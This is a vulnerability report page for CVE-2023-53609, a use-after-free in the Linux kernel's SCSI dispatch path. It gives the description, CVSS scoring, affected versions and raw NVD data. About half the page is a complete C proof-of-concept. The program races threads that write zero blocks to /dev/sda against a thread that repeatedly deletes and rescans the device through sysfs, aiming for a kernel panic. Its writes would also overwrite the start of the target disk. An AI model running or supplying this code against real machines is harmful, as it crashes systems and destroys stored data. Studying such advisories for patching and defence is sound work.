Security Vulnerability Report
CVE-2023-53609 CVSS 5.5 MEDIUM

Published: 2025-10-04 16:15:58
Last Modified: 2026-03-17 16:44:24
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

scsi: Revert "scsi: core: Do not increase scsi_device's iorequest_cnt if dispatch failed"

The "atomic_inc(&cmd->device->iorequest_cnt)" in scsi_queue_rq() would cause kernel panic because cmd->device may be freed after returning from scsi_dispatch_cmd().

This reverts commit cfee29ffb45b1c9798011b19d454637d1b0fe87d.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.4:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.4:rc2:*:*:*:*:*:* - VULNERABLE
Linux kernel versions after the introduction of commit cfee29ffb45b1c9798011b19d454637d1b0fe87d
Linux kernel mainline (affected branches)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2023-53609 PoC - Linux Kernel SCSI Use-After-Free Trigger
// This PoC demonstrates triggering the kernel panic by racing
// SCSI device removal with I/O dispatch failure.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <pthread.h>
#include <sys/ioctl.h>
#include <errno.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>

#define SCSI_DEVICE_PATH "/dev/sda"
#define NUM_THREADS 16
#define ITERATIONS 10000

// Thread 1: Continuously issue I/O to the SCSI device
void *io_worker(void *arg) {
    char path[64];
    snprintf(path, sizeof(path), "%s", (char *)arg);

    for (int i = 0; i < ITERATIONS; i++) {
        int fd = open(path, O_RDWR | O_DIRECT);
        if (fd < 0) continue;

        char buf[4096];
        memset(buf, 0, sizeof(buf));

        // Issue read/write to trigger scsi_queue_rq -> scsi_dispatch_cmd path
        ssize_t ret = write(fd, buf, sizeof(buf));
        if (ret < 0) {
            // Failed dispatch may trigger the vulnerable code path
            // where cmd->device could be freed
        }

        close(fd);
        usleep(1);
    }
    return NULL;
}

// Thread 2: Trigger device removal/reset to race with I/O dispatch
void *removal_worker(void *arg) {
    for (int i = 0; i < ITERATIONS; i++) {
        // Trigger SCSI device rescan/removal via sysfs
        // This can cause scsi_device to be freed while
        // scsi_dispatch_cmd() is still processing
        int fd = open("/sys/block/sda/device/delete", O_WRONLY);
        if (fd >= 0) {
            write(fd, "1", 1);
            close(fd);
        }
        usleep(100);

        // Rescan to bring device back
        fd = open("/sys/bus/scsi/drivers/sd/0:0:0:0/rescan", O_WRONLY);
        if (fd >= 0) {
            write(fd, "1", 1);
            close(fd);
        }
        usleep(100);
    }
    return NULL;
}

int main(int argc, char *argv[]) {
    const char *dev = (argc > 1) ? argv[1] : SCSI_DEVICE_PATH;

    printf("[*] CVE-2023-53609 PoC - SCSI Use-After-Free\n");
    printf("[*] Target device: %s\n", dev);
    printf("[*] Racing I/O dispatch with device removal...\n");

    pthread_t threads[NUM_THREADS];

    // Create I/O worker threads
    for (int i = 0; i < NUM_THREADS - 1; i++) {
        pthread_create(&threads[i], NULL, io_worker, (void *)dev);
    }

    // Create removal worker thread
    pthread_create(&threads[NUM_THREADS - 1], NULL, removal_worker, NULL);

    // Wait for all threads
    for (int i = 0; i < NUM_THREADS; i++) {
        pthread_join(threads[i], NULL);
    }

    printf("[*] Done. Check dmesg for kernel panic.\n");
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53609", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:57.647", "lastModified": "2026-03-17T16:44:23.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: Revert \"scsi: core: Do not increase scsi_device's iorequest_cnt if dispatch failed\"\n\nThe \"atomic_inc(&cmd->device->iorequest_cnt)\" in scsi_queue_rq() would\ncause kernel panic because cmd->device may be freed after returning from\nscsi_dispatch_cmd().\n\nThis reverts commit cfee29ffb45b1c9798011b19d454637d1b0fe87d."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.3.4", "matchCriteriaId": "26C54BF0-3EED-46D4-92A7-5F07F658B49B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.4:rc1:*:*:*:*:*:*", "matchCriteriaId": "38BC6744-7D25-4C02-9966-B224CD071D30"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.4:rc2:*:*:*:*:*:*", "matchCriteriaId": "76061B41-CAE9-4467-BEDE-0FFC7956F2A1"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/35fe6fa57b994e7da222893adf0bb748d6055e73", "source": 
"416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6ca9818d1624e136a76ae8faedb6b6c95ca66903", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}